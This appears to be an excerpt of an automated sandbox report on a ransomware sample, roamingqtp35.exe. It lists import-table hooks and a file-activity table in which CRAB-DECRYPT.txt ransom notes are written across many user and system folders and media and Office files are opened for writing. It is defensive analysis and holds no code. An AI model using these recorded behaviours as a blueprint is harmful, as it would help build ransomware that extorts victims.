IAT private_0x0000000000780000:+0x696cc 27. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetHandleCount+0x0 now points to private_0x000000007fff0000:+0x25161fce
...
IAT private_0x0000000000780000:+0x696cc 30. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x7cd8fa5c
...
IAT private_0x0000000000780000:+0x696cc 31. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x9242e76
...
IAT private_0x0000000000780000:+0x696cc 32. entry of roamingqtp35.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x5dcf6b3b
...
IAT private_0x0000000000780000:+0x696cc 33. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x7d6a5255
...
IAT private_0x0000000000780000:+0x696cc 35. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x6c633147
...
IAT private_0x0000000000780000:+0x696cc 36. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x750303f9
...
IAT private_0x0000000000780000:+0x696cc 39. entry of roamingqtp35.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x7f836a17
...
IAT private_0x0000000000780000:+0x696cc 40. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x4e7c1f04
...
IAT private_0x0000000000780000:+0x696cc 42. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x57fd5c12
...
IAT private_0x0000000000780000:+0x696cc 44. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x7d463088
...
IAT private_0x0000000000780000:+0x696cc 49. entry of roamingqtp35.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x24ba1fce
...
IAT private_0x0000000000780000:+0x696cc 50. entry of roamingqtp35.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x433a1203
...
IAT private_0x0000000000780000:+0x696cc 73. entry of roamingqtp35.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x3a3e0fa5
...
IAT private_0x0000000000780000:+0x696cc 76. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x936cdce
...
IAT private_0x0000000000780000:+0x696cc 83. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStringTypeA+0x0 now points to private_0x000000007fff0000:+0xedafd55
...
IAT private_0x0000000000780000:+0x696cc 86. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetDateFormatA+0x0 now points to private_0x000000007fff0000:+0x44872e26
...
IAT private_0x0000000000780000:+0x696cc 90. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0xe5dea1e
...
IAT private_0x0000000000780000:+0x696cc 92. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x26dafb13
...
IAT private_0x0000000000780000:+0x696cc 96. entry of roamingqtp35.exe 4 bytes user32.dll:GetProcessWindowStation+0x0 now points to private_0x000000007fff0000:+0x3056d04
...
Host Behavior
File (3595)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\MSOCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\PerfLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Recovery\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\System Volume Information\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\AppData\Local\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Local\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\ggNuzUYFd.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\QbYwYSoMD3beKw.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\fUHonlL.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\brgVKnP3IVGPPX.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\P7UB2489\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\PCEJlbmpwZ68QNsWdvWo.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\Chs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\zP0nKisr4oLuznV8Y.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
